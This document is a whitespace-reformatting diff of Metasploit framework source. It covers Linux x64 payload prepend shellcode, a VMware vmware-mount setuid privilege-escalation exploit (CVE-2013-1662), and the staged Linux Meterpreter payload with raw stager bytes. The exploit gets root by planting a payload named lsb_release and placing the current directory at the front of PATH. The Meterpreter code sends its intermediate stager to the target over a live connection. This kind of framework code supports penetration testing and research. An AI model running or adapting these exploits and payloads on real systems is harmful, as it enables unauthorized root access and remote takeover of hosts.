pre << "\x6a\x50" # push 0x50 #
|
||||
pre << "\x58" # pop rax #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
pre << "\xfe\xcb" # dec bl #
|
||||
pre << "\x75\xf7" # jnz -7 #
|
||||
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
# chroot (.) (which should be /)
|
||||
pre << "\x6a\x2e" # push . (0x2e) #
|
||||
pre << "\x48\x89\xe7" # mov rdi,rsp #
|
||||
pre << "\x48\x89\xd0" # mov rax,rdx #
|
||||
pre << "\x0f\x05" # syscall #
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
# Append exit(0)
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x48\x31\xff" # xor rdi,rdi #
|
||||
app << "\x6a\x3c" # push 0x3c #
|
||||
app << "\x58" # pop rax #
|
||||
app << "\x0f\x05" # syscall #
|
||||
end
|
||||
end
|
||||
|
||||
return (pre + buf + app)
|
||||
end
|
||||
return (pre + buf + app)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -16,48 +16,48 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info, {
|
||||
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
|
||||
'Description' => %q{
|
||||
VMWare Workstation (up to and including 9.0.2 build-1031769)
|
||||
and Player have a setuid executable called vmware-mount that
|
||||
invokes lsb_release in the PATH with popen(3). Since PATH is
|
||||
user-controlled, and the default system shell on
|
||||
Debian-derived distributions does not drop privs, we can put
|
||||
an arbitrary payload in an executable called lsb_release and
|
||||
have vmware-mount happily execute it as root for us.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Vulnerability discovery and PoC
|
||||
'egypt' # Metasploit module
|
||||
],
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[ 'CVE', '2013-1662' ],
|
||||
[ 'OSVDB', '96588' ],
|
||||
[ 'BID', '61966'],
|
||||
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
|
||||
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
|
||||
],
|
||||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
end
|
||||
def initialize(info={})
|
||||
super( update_info( info, {
|
||||
'Name' => 'VMWare Setuid vmware-mount Unsafe popen(3)',
|
||||
'Description' => %q{
|
||||
VMWare Workstation (up to and including 9.0.2 build-1031769)
|
||||
and Player have a setuid executable called vmware-mount that
|
||||
invokes lsb_release in the PATH with popen(3). Since PATH is
|
||||
user-controlled, and the default system shell on
|
||||
Debian-derived distributions does not drop privs, we can put
|
||||
an arbitrary payload in an executable called lsb_release and
|
||||
have vmware-mount happily execute it as root for us.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Tavis Ormandy', # Vulnerability discovery and PoC
|
||||
'egypt' # Metasploit module
|
||||
],
|
||||
'Platform' => [ 'linux' ],
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
"PrependSetresuid" => true,
|
||||
"PrependSetresgid" => true,
|
||||
"PrependFork" => true,
|
||||
},
|
||||
'Privileged' => true,
|
||||
'DefaultTarget' => 0,
|
||||
'References' => [
|
||||
[ 'CVE', '2013-1662' ],
|
||||
[ 'OSVDB', '96588' ],
|
||||
[ 'BID', '61966'],
|
||||
[ 'URL', 'http://blog.cmpxchg8b.com/2013/08/security-debianisms.html' ],
|
||||
[ 'URL', 'http://www.vmware.com/support/support-resources/advisories/VMSA-2013-0010.html' ]
|
||||
],
|
||||
'DisclosureDate' => "Aug 22 2013"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def check
|
||||
if setuid?("/usr/bin/vmware-mount")
|
||||
|
@ -72,7 +72,7 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
|
||||
end
|
||||
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
write_file("lsb_release", generate_payload_exe)
|
||||
|
||||
cmd_exec("chmod +x lsb_release")
|
||||
cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
|
||||
|
|
|
@ -11,8 +11,8 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
|
|
|
@ -11,96 +11,96 @@ require 'msf/base/sessions/meterpreter_options'
|
|||
require 'rex/elfparsey'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
include Msf::Sessions::MeterpreterOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Staged meterpreter server',
|
||||
'Author' => ['PKS', 'egypt'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Linux Meterpreter',
|
||||
'Description' => 'Staged meterpreter server',
|
||||
'Author' => ['PKS', 'egypt'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'License' => MSF_LICENSE,
|
||||
'Session' => Msf::Sessions::Meterpreter_x86_Linux))
|
||||
|
||||
register_options([
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
register_options([
|
||||
OptInt.new('DebugOptions', [ false, "Debugging options for POSIX meterpreter", 0 ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
end
|
||||
def elf_ep(payload)
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
ep = elf.elf_header.e_entry
|
||||
return ep
|
||||
end
|
||||
|
||||
def elf2bin(payload)
|
||||
# XXX, not working. Use .c version
|
||||
def elf2bin(payload)
|
||||
# XXX, not working. Use .c version
|
||||
|
||||
# This code acts as a mini elf parser / memory layout linker.
|
||||
# It will return what a elf file looks like once loaded in memory
|
||||
# This code acts as a mini elf parser / memory layout linker.
|
||||
# It will return what a elf file looks like once loaded in memory
|
||||
|
||||
mem = "\x00" * (4 * 1024 * 1024)
|
||||
used = 0
|
||||
mem = "\x00" * (4 * 1024 * 1024)
|
||||
used = 0
|
||||
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
|
||||
|
||||
elf.program_header.each { |hdr|
|
||||
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
|
||||
print_status("Found PT_LOAD")
|
||||
fileidx = hdr.p_offset & (~4095)
|
||||
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
|
||||
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
|
||||
elf.program_header.each { |hdr|
|
||||
if(hdr.p_type == Rex::ElfParsey::ElfBase::PT_LOAD)
|
||||
print_status("Found PT_LOAD")
|
||||
fileidx = hdr.p_offset & (~4095)
|
||||
memidx = (hdr.p_vaddr & (~4095)) - elf.base_addr
|
||||
len = hdr.p_filesz + (hdr.p_vaddr & 4095)
|
||||
|
||||
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
|
||||
used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
|
||||
end
|
||||
}
|
||||
mem[memidx,memidx+len] = payload[fileidx,fileidx+len] # should result in a single memcpy call :D
|
||||
used += (hdr.p_memsz + (hdr.p_vaddr & 4095) + 4095) & ~4095
|
||||
end
|
||||
}
|
||||
|
||||
# Maybe at some stage zero out elf header / program headers in case tools
|
||||
# try to look for them
|
||||
# Maybe at some stage zero out elf header / program headers in case tools
|
||||
# try to look for them
|
||||
|
||||
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
|
||||
return mem[0, used]
|
||||
end
|
||||
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
|
||||
return mem[0, used]
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
# Does a mmap() / read() loop of a user specified length, then
|
||||
# jumps to the entry point (the \x5a's)
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
# Does a mmap() / read() loop of a user specified length, then
|
||||
# jumps to the entry point (the \x5a's)
|
||||
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
|
||||
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
|
||||
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
|
||||
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
|
||||
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
|
||||
"\xd1\xff\xff\xff"
|
||||
midstager <<
|
||||
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
|
||||
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
|
||||
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
|
||||
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
|
||||
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
|
||||
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
|
||||
"\xd1\xff\xff\xff"
|
||||
|
||||
|
||||
# Patch in debug options
|
||||
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
|
||||
# Patch in debug options
|
||||
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
|
||||
|
||||
# Patch entry point
|
||||
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
|
||||
# Patch entry point
|
||||
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
|
||||
|
||||
# Maybe in the future patch in base.
|
||||
# Maybe in the future patch in base.
|
||||
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
|
||||
conn.put(midstager)
|
||||
Rex::ThreadSafe.sleep(1.5)
|
||||
|
||||
# Send length of payload
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
return true
|
||||
# Send length of payload
|
||||
conn.put([ payload.length ].pack('V'))
|
||||
return true
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
def generate_stage
|
||||
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
|
||||
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
|
||||
def generate_stage
|
||||
#file = File.join(Msf::Config.data_directory, "msflinker_linux_x86.elf")
|
||||
file = File.join(Msf::Config.install_root, "data", "meterpreter", "msflinker_linux_x86.bin")
|
||||
|
||||
met = File.open(file, "rb") {|f|
|
||||
f.read(f.stat.size)
|
||||
|
|
|
@ -10,8 +10,8 @@ require 'msf/base/sessions/command_shell'
|
|||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
include Msf::Payload::Linux
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
|
|